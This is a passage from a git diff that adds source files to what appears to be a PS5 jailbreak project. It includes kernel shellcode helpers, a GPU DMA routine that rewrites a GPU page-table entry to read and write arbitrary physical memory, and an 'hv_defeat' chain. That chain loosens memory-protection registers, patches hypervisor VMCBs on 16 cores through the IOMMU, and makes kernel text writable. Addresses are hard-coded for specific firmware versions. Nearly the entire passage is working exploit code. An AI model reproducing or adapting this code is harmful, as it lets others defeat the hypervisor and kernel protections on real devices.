fun_acpi_set_fw_waking_vector; + uint64_t fun_smp_rendezvous; + uint64_t fun_smp_no_rendevous_barrier; + uint64_t fun_transmitter_control; + uint64_t fun_mp3_initialize; + uint64_t fun_mp3_invoke; + uint64_t g_vbios; + uint64_t iommu_mmio_va; + uint64_t iommu_cb2_va; + uint64_t iommu_cb3_va; + uint64_t iommu_eb_va; + uint64_t vmcb[16]; + uint64_t kernel_uart_override; + uint64_t hv_handle_vmexit_pa; + uint64_t hv_code_cave_pa; + uint64_t hv_uart_override_pa; + uint64_t linux_info_va; // To relocate by kernel shellcode +} shellcode_kernel_args; + +extern shellcode_kernel_args args; // Declared on main.c + +#endif \ No newline at end of file diff --git a/shellcode_kernel/utils.c b/shellcode_kernel/utils.c new file mode 100644 index 0000000..69c1cc2 --- /dev/null +++ b/shellcode_kernel/utils.c @@ -0,0 +1,77 @@ +#include "utils.h" +#include "shellcode_kernel_args.h" + +extern shellcode_kernel_args args; + +uint64_t PHYS_TO_DMAP(uint64_t pa) { return args.dmap_base + pa; } + +void memcpy(void *dest, void *src, uint64_t len) { + uint8_t *d = (uint8_t *)dest; + const uint8_t *s = (const uint8_t *)src; + for (uint64_t i = 0; i < len; i++) { + d[i] = s[i]; + } +} + +uint64_t read_cr3(void) { + uint64_t cr3; + __asm__ volatile("mov %%cr3, %0" + : "=r"(cr3) // Output: move CR3 into the variable 'cr3' + : // No inputs + : // No clobbered registers + ); + return cr3; +} + +// for ring0 +uint64_t va_to_pa_kernel(uint64_t va) { + uint64_t cr3 = read_cr3(); + return va_to_pa_custom(va, cr3); +} + +// Source: PS5_kldload +uint64_t va_to_pa_custom(uint64_t va, uint64_t cr3_custom) { + + uint64_t table_phys = cr3_custom & 0xFFFFFFFF; + + for (int level = 0; level < 4; level++) { + int shift = 39 - (level * 9); + uint64_t idx = (va >> shift) & 0x1FF; + uint64_t entry; + uint64_t entry_va = PHYS_TO_DMAP(PAGE_PA(table_phys) + idx * 8); + + entry = *(uint64_t *)entry_va; + + if (!PAGE_P(entry)) + return 0; + + if ((level == 1 || level == 2) && PAGE_PS(entry)) { + uint64_t page_size = P_SIZE(level); + return PAGE_PA(entry) | (va & (page_size - 1)); + } + + if (level == 3) + return PAGE_PA(entry) | (va & 0xFFF); + + table_phys = PAGE_PA(entry); + } + return 0; +} + +__attribute__((noinline, optimize("O0"))) uint32_t putc_uart(uint64_t dmap, + uint8_t tx_byte) { + volatile uint32_t *uart_tx = dmap + 0xc1010104ULL; + volatile uint32_t *uart_busy = dmap + 0xc101010cULL; + uint64_t timeout = 0xFFFFFFFF; + do { + timeout--; + if (timeout == 0) + break; + } while (((*uart_busy) & 0x20) == 0); + + if (timeout == 0) + return -1; + + *uart_tx = (uint32_t)tx_byte & 0xFF; + return 0; +} \ No newline at end of file diff --git a/shellcode_kernel/utils.h b/shellcode_kernel/utils.h new file mode 100644 index 0000000..08e51e5 --- /dev/null +++ b/shellcode_kernel/utils.h @@ -0,0 +1,43 @@ +#ifndef UTILS_H +#define UTILS_H +#include "shellcode_kernel_args.h" +#include + +extern void (*printf)(const char *format, ...); +uint64_t PHYS_TO_DMAP(uint64_t pa); +void memcpy(void *dest, void *src, uint64_t len); + +// Defines for Page management +enum page_bits { + P = 0, + RW, + US, + PWT, + PCD, + A, + D, + PS, + G, + XO = 58, + PK = 59, + NX = 63 +}; + +#define PG_B_P (1ULL << P) +#define PG_B_RW (1ULL << RW) +#define PAGE_P(x) (x & (1ULL << P)) +#define PAGE_RW(x) (x & (1ULL << RW)) +#define PAGE_PS(x) (x & (1ULL << PS)) +#define PAGE_XO(x) (x & (1ULL << XO)) +#define PAGE_CLEAR_XO(x) (x &= ~(1ULL << XO)) +#define PAGE_CLEAR_G(x) (x &= ~(1ULL << G)) +#define PAGE_SET_RW(x) (x |= (1ULL << RW)) +#define PAGE_PA(x) (x & 0x000FFFFFFFFFF000ULL) +#define P_SIZE(l) ((l == 1) ? (1ULL << 30) : (1ULL << 21)) + +uint64_t read_cr3(void); +uint64_t va_to_pa_kernel(uint64_t va); +uint64_t va_to_pa_custom(uint64_t va, uint64_t cr3_custom); +uint32_t putc_uart(uint64_t dmap, uint8_t tx_byte); + +#endif \ No newline at end of file diff --git a/source/gpu.c b/source/gpu.c new file mode 100644 index 0000000..570fdf9 --- /dev/null +++ b/source/gpu.c @@ -0,0 +1,495 @@ +#include "gpu.h" +#include "utils.h" +#include +#include +#include +#include +#include +#include +#include +#include + +int sceKernelAllocateMainDirectMemory(size_t size, size_t alignment, + int mem_type, uint64_t *phys_out); +int sceKernelMapNamedDirectMemory(void **va_out, size_t size, int prot, + int flags, uint64_t phys, size_t alignment, + const char *name); +int sceKernelSleep(int secs); + +static struct gpu_ctx s_gpu = {0}; +static struct gpu_kernel_offsets s_gpu_offsets = {0}; +static int s_offsets_set = 0; + +struct gpu_ctx *gpu_get_ctx(void) { return &s_gpu; } + +void gpu_set_offsets(struct gpu_kernel_offsets *offsets) { + memcpy(&s_gpu_offsets, offsets, sizeof(s_gpu_offsets)); + s_offsets_set = 1; +} + +static uint64_t gpu_pde_field(uint64_t pde, int shift, uint64_t mask) { + return (pde >> shift) & mask; +} + +static int gpu_get_vmid(void) { + uint64_t curproc = kernel_get_proc(getpid()); + uint64_t vmspace; + uint32_t vmid; + + kernel_copyout(curproc + s_gpu_offsets.proc_vmspace, &vmspace, + sizeof(vmspace)); + kernel_copyout(vmspace + s_gpu_offsets.vmspace_vm_vmid, &vmid, sizeof(vmid)); + + return (int)vmid; +} + +static uint64_t gpu_get_pdb2_addr(int vmid) { + uint64_t gvmspace = KERNEL_ADDRESS_DATA_BASE + + s_gpu_offsets.data_base_gvmspace + + (uint64_t)vmid * s_gpu_offsets.sizeof_gvmspace; + + uint64_t pdb2_va; + kernel_copyout(gvmspace + s_gpu_offsets.gvmspace_page_dir_va, &pdb2_va, + sizeof(pdb2_va)); + return pdb2_va; +} + +static uint64_t gpu_get_relative_va(int vmid, uint64_t va) { + uint64_t gvmspace = KERNEL_ADDRESS_DATA_BASE + + s_gpu_offsets.data_base_gvmspace + + (uint64_t)vmid * s_gpu_offsets.sizeof_gvmspace; + + uint64_t start_va, size; + kernel_copyout(gvmspace + s_gpu_offsets.gvmspace_start_va, &start_va, + sizeof(start_va)); + kernel_copyout(gvmspace + s_gpu_offsets.gvmspace_size, &size, sizeof(size)); + + if (va >= start_va && va < start_va + size) + return va - start_va; + + return (uint64_t)-1; +} + +static uint64_t gpu_walk_pt(int vmid, uint64_t gpu_va, + uint64_t *out_page_size) { + uint64_t pdb2_addr = gpu_get_pdb2_addr(vmid); + + uint64_t pml4e_idx = (gpu_va >> 39) & 0x1FF; + uint64_t pdpe_idx = (gpu_va >> 30) & 0x1FF; + uint64_t pde_idx = (gpu_va >> 21) & 0x1FF; + + // PDB2 (PML4 equivalent) + uint64_t pml4e; + kernel_copyout(pdb2_addr + pml4e_idx * 8, &pml4e, sizeof(pml4e)); + + if (gpu_pde_field(pml4e, GPU_PDE_VALID_BIT, 1) != 1) + return 0; + + // PDB1 (PDPT equivalent) + uint64_t pdp_pa = pml4e & GPU_PDE_ADDR_MASK; + uint64_t pdpe_va = dmap + pdp_pa + pdpe_idx * 8; + uint64_t pdpe; + kernel_copyout(pdpe_va, &pdpe, sizeof(pdpe)); + + if (gpu_pde_field(pdpe, GPU_PDE_VALID_BIT, 1) != 1) + return 0; + + // PDB0 (PD equivalent) + uint64_t pd_pa = pdpe & GPU_PDE_ADDR_MASK; + uint64_t pde_va = dmap + pd_pa + pde_idx * 8; + uint64_t pde; + kernel_copyout(pde_va, &pde, sizeof(pde)); + + if (gpu_pde_field(pde, GPU_PDE_VALID_BIT, 1) != 1) + return 0; + + // If IS_PTE bit set, this is a 2MB leaf + if (gpu_pde_field(pde, GPU_PDE_IS_PTE_BIT, 1) == 1) { + *out_page_size = 0x200000; + return pde_va; + } + + // PTB (page table block) + uint64_t frag_size = gpu_pde_field(pde, GPU_PDE_BLOCK_FRAG_BIT, 0x1F); + uint64_t offset = gpu_va & 0x1FFFFF; + uint64_t pt_pa = pde & GPU_PDE_ADDR_MASK; + + uint64_t pte_idx, pte_va; + + if (frag_size == 4) { + pte_idx = offset >> 16; + pte_va = dmap + pt_pa + pte_idx * 8; + + uint64_t pte; + kernel_copyout(pte_va, &pte, sizeof(pte)); + + if (gpu_pde_field(pte, GPU_PDE_VALID_BIT, 1) == 1 && + gpu_pde_field(pte, GPU_PDE_TF_BIT, 1) == 1) { + pte_idx = (gpu_va & 0xFFFF) >> 13; + pte_va = dmap + pt_pa + pte_idx * 8; + *out_page_size = 0x2000; // 8KB + } else { + *out_page_size = 0x10000; // 64KB + } + } else if (frag_size == 1) { + pte_idx = offset >> 13; + pte_va = dmap + pt_pa + pte_idx * 8; + *out_page_size = 0x2000; // 8KB + } else { + // Unknown fragment size - use 64KB as default + pte_idx = offset >> 16; + pte_va = dmap + pt_pa + pte_idx * 8; + *out_page_size = 0x10000; + } + + return pte_va; +} + +static uint64_t gpu_alloc_dmem(uint64_t size, int gpu_write) { + uint64_t phys_out = 0; + void *va_out = NULL; + + int prot = PROT_READ | PROT_WRITE | PROT_GPU_READ; + if (gpu_write) + prot |= PROT_GPU_WRITE; + + int ret = sceKernelAllocateMainDirectMemory(size, size, 1, &phys_out); + if (ret != 0) { + printf("[gpu] sceKernelAllocateMainDirectMemory failed: 0x%d\n", ret); + return 0; + } + + ret = sceKernelMapNamedDirectMemory(&va_out, size, prot, MAP_NO_COALESCE, + phys_out, size, "gpudma"); + if (ret != 0) { + printf("[gpu] sceKernelMapNamedDirectMemory failed: 0x%d\n", ret); + return 0; + } + + return (uint64_t)va_out; +} + +static uint32_t pm4_type3_header(uint32_t opcode, uint32_t count) { + return ((PM4_TYPE3 & 0x3) << 30) | (((count - 1) & 0x3FFF) << 16) | + ((opcode & 0xFF) << 8) | ((PM4_SHADER_COMPUTE & 0x1) << 1); +} + +static int pm4_build_dma_data(void *buf, uint64_t dst_va, uint64_t src_va, + uint32_t length) { + uint32_t *pkt = (uint32_t *)buf; + uint32_t count = 6; + + uint32_t dma_hdr = (1u << 31) // cp_sync + | (2u << 25) // dst_cache_policy + | (1u << 27) // dst_volatile + | (2u << 13) // src_cache_policy + | (1u << 15); // src_volatile + + pkt[0] = pm4_type3_header(PM4_OPCODE_DMA_DATA, count); + pkt[1] = dma_hdr; + pkt[2] = (uint32_t)(src_va & 0xFFFFFFFF); + pkt[3] = (uint32_t)(src_va >> 32); + pkt[4] = (uint32_t)(dst_va & 0xFFFFFFFF); + pkt[5] = (uint32_t)(dst_va >> 32); + pkt[6] = length & 0x1FFFFF; + + return 7 * sizeof(uint32_t); +} + +static void gpu_build_cmd_descriptor(void *desc, uint64_t gpu_addr, + uint32_t size_bytes) { + uint64_t *d = (uint64_t *)desc; + uint32_t size_dwords = size_bytes >> 2; + + d[0] = ((gpu_addr & 0xFFFFFFFFULL) << 32) | 0xC0023F00ULL; + d[1] = + (((uint64_t)size_dwords & 0xFFFFF) << 32) | ((gpu_addr >> 32) & 0xFFFF); +} + +static int gpu_submit_commands(int fd, uint32_t pipe_id, uint32_t cmd_count, + uint64_t descriptors_ptr) { + struct { + uint32_t pipe_id; + uint32_t count; + uint64_t cmd_buf_ptr; + } submit; + + submit.pipe_id = pipe_id; + submit.count = cmd_count; + submit.cmd_buf_ptr = descriptors_ptr; + + return ioctl(fd, GPU_SUBMIT_IOCTL, &submit); +} + +static int gpu_transfer_physical(uint64_t phys_addr, void *local_buf, + uint32_t size, int is_write) { + if (!s_gpu.initialized) + return -1; + + uint64_t aligned_pa = phys_addr & ~(s_gpu.dmem_size - 1); + uint64_t offset = phys_addr - aligned_pa; + + if (offset + size > s_gpu.dmem_size) { + printf("[gpu] transfer exceeds dmem_size\n"); + return -1; + } + + int prot_ro = PROT_READ | PROT_WRITE | PROT_GPU_READ; + int prot_rw = prot_ro | PROT_GPU_WRITE; + + mprotect((void *)s_gpu.victim_va, s_gpu.dmem_size, prot_ro); + + uint64_t new_ptbe = s_gpu.cleared_ptbe | aligned_pa; + kernel_setlong(s_gpu.victim_ptbe_va, new_ptbe); + + mprotect((void *)s_gpu.victim_va, s_gpu.dmem_size, prot_rw); + uint64_t src, dst; + + if (is_write) { + memcpy((void *)s_gpu.transfer_va, local_buf, size); + src = s_gpu.transfer_va; + dst = s_gpu.victim_va + offset; + } else { + src = s_gpu.victim_va + offset; + dst = s_gpu.transfer_va; + } + + int cmd_size = pm4_build_dma_data((void *)s_gpu.cmd_va, dst, src, size); + + uint8_t desc[16]; + gpu_build_cmd_descriptor(desc, s_gpu.cmd_va, cmd_size); + + uint64_t desc_va = s_gpu.cmd_va + 0x1000; + memcpy((void *)desc_va, desc, 16); + + int ret = gpu_submit_commands(s_gpu.fd, 0, 1, desc_va); + if (ret != 0) { + printf("[gpu] ioctl submit failed: %d\n", ret); + return -1; + } + + // Wait for GPU DMA completion + // TODO: proper fence/signal wait + usleep(100000); + + if (!is_write) { + memcpy(local_buf, (void *)s_gpu.transfer_va, size); + } + + // Restore victim PTE to original physical address + uint64_t orig_ptbe = s_gpu.cleared_ptbe | s_gpu.victim_real_pa; + kernel_setlong(s_gpu.victim_ptbe_va, orig_ptbe); + + return 0; +} + +int gpu_init(void) { + // init GPU DMA + struct gpu_kernel_offsets go = {}; + go.proc_vmspace = KERNEL_OFFSET_PROC_P_VMSPACE; + go.vmspace_vm_vmid = env_offset.VMSPACE_VM_VMID; + go.sizeof_gvmspace = 0x100; + go.gvmspace_page_dir_va = 0x38; + go.gvmspace_size = 0x10; + go.gvmspace_start_va = 0x08; + go.data_base_gvmspace = env_offset.DATA_BASE_GVMSPACE; + + gpu_set_offsets(&go); + + if (gpu_init_internal()) + return -1; + + return 0; +} + +int gpu_init_internal(void) { + if (s_gpu.initialized) { + DEBUG_PRINT("[gpu] Already initialized\n"); + return 0; + } + + if (!s_offsets_set) { + DEBUG_PRINT("[gpu] ERROR: call gpu_set_offsets() first\n"); + return -1; + } + + DEBUG_PRINT("[gpu] init\n"); + + s_gpu.dmem_size = 2 * 0x100000; // 2MB + + // Step 1: Open GPU device + DEBUG_PRINT("[gpu] Opening /dev/gc\n"); + s_gpu.fd = open("/dev/gc", O_RDWR); + if (s_gpu.fd < 0) { + DEBUG_PRINT("[gpu] ERROR: failed to open /dev/gc (fd=%d)\n", s_gpu.fd); + return -1; + } + DEBUG_PRINT("[gpu] /dev/gc fd=%d\n", s_gpu.fd); + + // Step 2: Allocate 3 GPU-mapped buffers + DEBUG_PRINT("[gpu] Allocating GPU direct memory (3 x 2MB)\n"); + + s_gpu.victim_va = gpu_alloc_dmem(s_gpu.dmem_size, 1); + if (!s_gpu.victim_va) { + DEBUG_PRINT("[gpu] victim alloc failed\n"); + return -2; + } + + s_gpu.transfer_va = gpu_alloc_dmem(s_gpu.dmem_size, 1); + if (!s_gpu.transfer_va) { + DEBUG_PRINT("[gpu] transfer alloc failed\n"); + return -2; + } + + s_gpu.cmd_va = gpu_alloc_dmem(s_gpu.dmem_size, 1); + if (!s_gpu.cmd_va) { + DEBUG_PRINT("[gpu] cmd alloc failed\n"); + return -2; + } + + DEBUG_PRINT("[gpu] victim_va = 0x%lx\n", s_gpu.victim_va); + DEBUG_PRINT("[gpu] transfer_va = 0x%lx\n", s_gpu.transfer_va); + DEBUG_PRINT("[gpu] cmd_va = 0x%lx\n", s_gpu.cmd_va); + + // Step 3: Get the physical address of the victim buffer + s_gpu.victim_real_pa = va_to_pa_user(s_gpu.victim_va); + DEBUG_PRINT("[gpu] victim_real_pa = 0x%lx\n", s_gpu.victim_real_pa); + + // Step 4: Walk GPU page tables to find the PTE for the victim buffer + int vmid = gpu_get_vmid(); + DEBUG_PRINT("[gpu] GPU VMID = %d\n", vmid); + + if (s_gpu_offsets.data_base_gvmspace == 0) { + DEBUG_PRINT("[gpu] ERROR: data_base_gvmspace not set\n"); + return -3; + } + + uint64_t rel_va = gpu_get_relative_va(vmid, s_gpu.victim_va); + if (rel_va == (uint64_t)-1) { + DEBUG_PRINT("[gpu] ERROR: could not get relative VA for victim\n"); + return -3; + } + DEBUG_PRINT("[gpu] victim relative GPU VA = 0x%lx\n", rel_va); + + s_gpu.victim_ptbe_va = gpu_walk_pt(vmid, rel_va, &s_gpu.page_size); + if (s_gpu.victim_ptbe_va == 0) { + DEBUG_PRINT("[gpu] ERROR: GPU page table walk failed\n"); + return -4; + } + DEBUG_PRINT("[gpu] victim GPU PTE VA = 0x%lx\n", s_gpu.victim_ptbe_va); + DEBUG_PRINT("[gpu] victim GPU page sz = 0x%lx\n", s_gpu.page_size); + + if (s_gpu.page_size != s_gpu.dmem_size) { + DEBUG_PRINT("[gpu] WARNING: page size 0x%lx != dmem_size 0x%lx\n", + s_gpu.page_size, s_gpu.dmem_size); + } + + // Step 5: Prepare the cleared PTE template + int prot_ro = PROT_READ | PROT_WRITE | PROT_GPU_READ; + mprotect((void *)s_gpu.victim_va, s_gpu.dmem_size, prot_ro); + + uint64_t current_ptbe; + kernel_copyout(s_gpu.victim_ptbe_va, ¤t_ptbe, sizeof(current_ptbe)); + s_gpu.cleared_ptbe = current_ptbe & ~s_gpu.victim_real_pa; + + DEBUG_PRINT("[gpu] current PTE = 0x%lx\n", current_ptbe); + DEBUG_PRINT("[gpu] cleared PTE = 0x%lx\n", s_gpu.cleared_ptbe); + + int prot_rw = prot_ro | PROT_GPU_WRITE; + mprotect((void *)s_gpu.victim_va, s_gpu.dmem_size, prot_rw); + + s_gpu.initialized = 1; + DEBUG_PRINT("[gpu] ready\n"); + return 0; +} + +int gpu_test(void) { + if (!s_gpu.initialized) { + printf("[gpu] ERROR: not initialized\n"); + return -1; + } + + DEBUG_PRINT("[gpu] test\n"); + + // Test 1: Read a known kernel .data value via GPU DMA and compare + uint64_t test_va = (uint64_t)KERNEL_ADDRESS_DATA_BASE; + uint64_t test_pa = va_to_pa_kernel(test_va); + DEBUG_PRINT("[gpu] Test target: VA=0x%lx PA=0x%lx\n", test_va, test_pa); + + uint64_t kernel_val = kernel_getlong(test_va); + DEBUG_PRINT("[gpu] kernel_read8 = 0x%lx\n", kernel_val); + + uint64_t gpu_val = gpu_read_phys8(test_pa); + DEBUG_PRINT("[gpu] gpu_read8 = 0x%lx\n", gpu_val); + + if (kernel_val == gpu_val) { + printf("[gpu] *** TEST PASSED: values match ***\n"); + } else { + printf("[gpu] *** TEST FAILED: values differ ***\n"); + return -1; + } + + // Test 2: Write and read-back test + uint64_t test_write_pa = va_to_pa_user(s_gpu.transfer_va + 0x100000); + uint64_t magic = 0xDEADBEEFCAFEBABEULL; + + DEBUG_PRINT("[gpu] Write test: PA=0x%lx val=0x%lx\n", test_write_pa, magic); + gpu_write_phys8(test_write_pa, magic); + + uint64_t readback = gpu_read_phys8(test_write_pa); + DEBUG_PRINT("[gpu] Readback = 0x%lx\n", readback); + + if (readback == magic) { + printf("[gpu] *** WRITE TEST PASSED ***\n"); + } else { + printf("[gpu] *** WRITE TEST FAILED ***\n"); + return -1; + } + + printf("[gpu] tests ok\n"); + return 0; +} + +int gpu_read_phys(uint64_t phys_addr, void *out_buf, uint32_t size) { + return gpu_transfer_physical(phys_addr, out_buf, size, 0); +} + +uint8_t gpu_read_phys1(uint64_t phys_addr) { + uint8_t val = 0; + gpu_transfer_physical(phys_addr, &val, sizeof(val), 0); + return val; +} + +uint32_t gpu_read_phys4(uint64_t phys_addr) { + uint32_t val = 0; + gpu_transfer_physical(phys_addr, &val, sizeof(val), 0); + return val; +} + +uint64_t gpu_read_phys8(uint64_t phys_addr) { + uint64_t val = 0; + gpu_transfer_physical(phys_addr, &val, sizeof(val), 0); + return val; +} + +int gpu_write_phys(uint64_t phys_addr, const void *in_buf, uint32_t size) { + return gpu_transfer_physical(phys_addr, (void *)in_buf, size, 1); +} + +void gpu_write_phys4(uint64_t phys_addr, uint32_t value) { + gpu_transfer_physical(phys_addr, &value, sizeof(value), 1); +} + +void gpu_write_phys8(uint64_t phys_addr, uint64_t value) { + gpu_transfer_physical(phys_addr, &value, sizeof(value), 1); +} + +void gpu_cleanup(void) { + if (s_gpu.fd >= 0) { + close(s_gpu.fd); + s_gpu.fd = -1; + } + + s_gpu.initialized = 0; + printf("[gpu] Cleaned up\n"); +} diff --git a/source/hv_defeat.c b/source/hv_defeat.c new file mode 100644 index 0000000..5f5b2b7 --- /dev/null +++ b/source/hv_defeat.c @@ -0,0 +1,295 @@ +#include "hv_defeat.h" +#include "config.h" +#include "gpu.h" +#include "iommu.h" +#include "tmr.h" +#include "utils.h" +#include +#include +#include +#include +#include +#include + +uint64_t vmcb_pa[16]; + +int hv_defeat(void) { + if (gpu_init()) + return -1; + if (stage1_tmr_relax()) + return -1; + if (stage2_find_vmcbs()) + return -1; + iommu_selftest(); + if (stage3_patch_vmcbs()) + return -1; + if (stage4_force_vmcb_reload()) + return -1; + if (stage5_remove_xotext()) + return -1; + if (stage6_kernel_pmap_invalidate_all()) + return -1; + return 0; +} + +int stage1_tmr_relax(void) { + DEBUG_PRINT("\nHV-defeat [stage1] tmr relax: "); + + DEBUG_PRINT("Firmware version: %04x\n", fw); + + for (int t = 0; t < 22; t++) { + uint32_t b = tmr_read(TMR_BASE(t)); + uint32_t l = tmr_read(TMR_LIMIT(t)); + uint32_t c = tmr_read(TMR_CONFIG(t)); + if (c == 0 && b == 0 && l == 0) + continue; + DEBUG_PRINT(" tmr[%02d] 0x%012lx-0x%012lx cfg=0x%08x\n", t, + (uint64_t)b << 16, ((uint64_t)l << 16) | 0xFFFF, c); + } + + if (fw < 0x0300) { + tmr_write(TMR_CONFIG(16), TMR_CFG_PERMISSIVE); + + if (tmr_read(TMR_CONFIG(16)) != TMR_CFG_PERMISSIVE) + goto no_ok; + + } else { + tmr_write(TMR_CONFIG(5), TMR_CFG_PERMISSIVE); + tmr_write(TMR_CONFIG(16), TMR_CFG_PERMISSIVE); + tmr_write(TMR_CONFIG(17), TMR_CFG_PERMISSIVE); + tmr_write(TMR_CONFIG(18), TMR_CFG_PERMISSIVE); + + if (tmr_read(TMR_CONFIG(5)) != TMR_CFG_PERMISSIVE) + goto no_ok; + if (tmr_read(TMR_CONFIG(16)) != TMR_CFG_PERMISSIVE) + goto no_ok; + if (tmr_read(TMR_CONFIG(17)) != TMR_CFG_PERMISSIVE) + goto no_ok; + if (tmr_read(TMR_CONFIG(18)) != TMR_CFG_PERMISSIVE) + goto no_ok; + } + + DEBUG_PRINT("OK\n"); + return 0; + +no_ok: + DEBUG_PRINT("No OK\n"); + return -1; +} + +int stage2_find_vmcbs(void) { + DEBUG_PRINT("\nHV-defeat [stage2] vmcb discovery\n"); + + uint64_t vcpu_off = env_offset.HV_VCPU; + uint64_t stride = env_offset.HV_VCPU_CPUID; + // Testing direct VMCB on 04.03 + if ((!vcpu_off || !stride) && fw < 0x0300) { + DEBUG_PRINT(" missing HV_VCPU offsets for fw 0x%04x\n", fw); + return -1; + } + + for (int c = 0; c < 16; c++) { + vmcb_pa[c] = get_vmcb(c); + DEBUG_PRINT(" core %02d: pa=0x%016lx\n", c, vmcb_pa[c]); + } + + return 0; +} + +// Only valid for 3.xx and 4.xx +// 1.xx and 2.xx have dynamic page alloc for VMCB +// TODO: add 1.xx and 2.xx logic +uint64_t get_vmcb(int core) { + switch (fw) { + case 0x0300: + case 0x0310: + case 0x0320: + case 0x0321: + return (uint64_t)0x6290B000 + (uint64_t)core * 0x3000; + break; + case 0x0400: + case 0x0402: + case 0x0403: + case 0x0450: + case 0x0451: + return (uint64_t)0x62A05000 + (uint64_t)core * 0x3000; + break; + default: + return -1; + } +} + +int iommu_selftest(void) { + DEBUG_PRINT("\n[iommu] self-test\n"); + + uint64_t scratch = 0xAAAAAAAABBBBBBBBULL; + uint64_t scratch_pa = va_to_pa_user((uint64_t)&scratch); + + if (!scratch_pa || scratch_pa >= 0x100000000ULL) { + DEBUG_PRINT(" bad scratch PA 0x%016lx\n", scratch_pa); + return -1; + } + + uint64_t pattern = 0xDEADCAFE12345678ULL; + DEBUG_PRINT(" scratch pa=0x%016lx before=0x%016lx\n", scratch_pa, scratch); + + iommu_write8_pa(scratch_pa, pattern); + uint64_t readback = kread64(dmap + scratch_pa); + + DEBUG_PRINT(" wrote=0x%016lx read=0x%016lx %s\n", pattern, readback, + (readback == pattern) ? "OK" : "FAIL"); + + return (readback == pattern) ? 0 : -1; +} + +int stage3_patch_vmcbs(void) { + DEBUG_PRINT("\nHV-defeat [stage3-iommu] vmcb patch via IOMMU\n"); + + int cur = sceKernelGetCurrentCpu(); + pin_to_core(cur); + + for (int i = 0; i < 16; i++) { + uint64_t pa = vmcb_pa[i]; + + iommu_write8_pa(pa + 0x00, 0x0000000000000000ULL); + iommu_write8_pa(pa + 0x08, 0x0004000000000000ULL); + iommu_write8_pa(pa + 0x10, 0x000000000000000FULL); + iommu_write8_pa(pa + 0x58, 0x0000000000000001ULL); + iommu_write8_pa(pa + 0x90, 0x0000000000000000ULL); + + DEBUG_PRINT(" vmcb[%2d] patched (pa=0x%016lx)\n", i, pa); + + // uint64_t vmcb_00 = gpu_read_phys8(pa + 0x00); + // uint64_t vmcb_08 = gpu_read_phys8(pa + 0x08); + // uint64_t vmcb_10 = gpu_read_phys8(pa + 0x10); + // uint64_t vmcb_58 = gpu_read_phys8(pa + 0x58); + // uint64_t vmcb_90 = gpu_read_phys8(pa + 0x90); + + // printf("Values read from VMCB: %016lx %016lx %016lx %016lx %016lx\n", + // vmcb_00, vmcb_08, vmcb_10, vmcb_58, vmcb_90 + // ); + + usleep(1000); + } + + pin_to_core(9); + + DEBUG_PRINT(" done, 16 cores\n"); + return 0; +} + +static jmp_buf jmp_env; +static volatile int vmmcall_faulted = 0; + +void handle_sigill(int sig) { + vmmcall_faulted = 1; + longjmp(jmp_env, 1); +} + +int stage4_force_vmcb_reload(void) { + + int ret = 0; + + auto old_handler = signal(SIGILL, handle_sigill); + + for (int i = 0; i < 16; i++) { + pin_to_core(i); + vmmcall_faulted = 0; + + if (setjmp(jmp_env) == 0) { + __asm__ volatile("vmmcall"); + } + + usleep(1000); + DEBUG_PRINT("[vmmcall] core: %02d %s\n", i, + vmmcall_faulted ? "SIGILL (caught)" : "ok"); + + // Accumulate results + ret |= vmmcall_faulted; + } + + signal(SIGILL, old_handler); + + // Return -1 if we didn't caught them + return ret ? 0 : -1; +} + +int stage5_remove_xotext(void) { + DEBUG_PRINT("\nHV-Defeat [stage5] xotext removal\n"); + + uint64_t start = + ktext - 0xF0000; // Include first pages where fun stuff is located + uint64_t end = kdata; + int n = 0; + + for (uint64_t a = start; a < end; a += 0x1000) { + page_chain_set_rw(a); + n++; + } + DEBUG_PRINT(" %d pages on ktext\n", n); + + start = kdata; + end = kdata + 0x08000000; + n = 0; + for (uint64_t a = start; a < end; a += 0x1000) { + page_chain_set_rw(a); + n++; + } + DEBUG_PRINT(" %d pages on kdata\n", n); + return 0; +} + +int stage6_kernel_pmap_invalidate_all(void) { + + DEBUG_PRINT("HV-Defeat [stage6] invalidate paging entries\n"); + + static uint64_t two_zero_pages[PAGE_SIZE * 2] = {0}; + + int pipe_fds[2]; + // set O_NONBLOCK to avoid PIPE_DIRECTW + if (pipe2(pipe_fds, O_NONBLOCK)) { + return -1; + } + + // the pipe starts off as 1 page large - we need to write into the pipe so it + // will grow to BIG_PIPE_SIZE we need to make sure pmap_invalidate_all doesnt + // use the one page fast path + if (write(pipe_fds[1], two_zero_pages, PAGE_SIZE * 2) < 0) { + close(pipe_fds[0]); + close(pipe_fds[1]); + return -1; + } + + // dont need this anymore + close(pipe_fds[1]); + + uint64_t read_fd_file_data = kernel_get_proc_file(-1, pipe_fds[0]); + + if (!INKERNEL(read_fd_file_data)) { + close(pipe_fds[0]); + return -1; + } + + uint64_t read_fd_buffer; + kernel_copyout(read_fd_file_data + 0x10, &read_fd_buffer, + sizeof(read_fd_buffer)); + + if (!INKERNEL(read_fd_buffer)) { + close(pipe_fds[0]); + return -1; + } + + // inside pmap_remove anyvalid has to be 1 for pmap_invalidate_all to be + // called anyvalid is only set if there is at least 1 non global entry being + // removed set the first entry as non global, its being removed anyway so its + // fine (?) + if (!page_remove_global(read_fd_buffer)) { + close(pipe_fds[0]); + return -1; + } + + // fd 0 is read end, it holds the buffer, this close is what does the + // pmap_invalidate_all because pmap == kernel_pmap, it will do invltlb_glob + close(pipe_fds[0]); + return 0; +} \ No newline at end of file diff --git a/source/iommu.c b/source/iommu.c new file mode 100644 index 0000000..20ac73a --- /dev/null +++ b/source/iommu.c @@ -0,0 +1,103 @@ +#include "iommu.h" +#include "utils.h" +#include +#include + +iommu_ctx iommu_store; +iommu_ctx *iommu = &iommu_store; + +int iommu_init(void) { + uint64_t softc_ptr = get_offset_va(env_offset.IOMMU_SOFTC); + if (softc_ptr == ktext) { + DEBUG_PRINT("[iommu] no IOMMU_SOFTC offset"); + return -1; + } + + uint64_t softc = kread64(softc_ptr); + if (!softc) { + DEBUG_PRINT("[iommu] softc is NULL\n"); + return -2; + } + + iommu->mmio_va = kread64(softc + IOMMU_SC_MMIO_VA); + iommu->cb2_base = kread64(softc + IOMMU_SC_CB2_PTR); + iommu->cb3_base = kread64(softc + IOMMU_SC_CB3_PTR); + iommu->eb_base = kread64(softc + IOMMU_SC_EB_PTR); + + if (!iommu->cb2_base || !iommu->mmio_va) { + DEBUG_PRINT("[iommu] cb=0x%016lx mmio=0x%016lx - not initialized\n", + iommu->cb2_base, iommu->mmio_va); + return -3; + } + + DEBUG_PRINT("[iommu] softc=0x%016lx cb=0x%016lx mmio=0x%016lx\n", softc, + iommu->cb2_base, iommu->mmio_va); + return 0; +} + +// Submit a single 16-byte command and wait for completion +void iommu_submit_cmd(const void 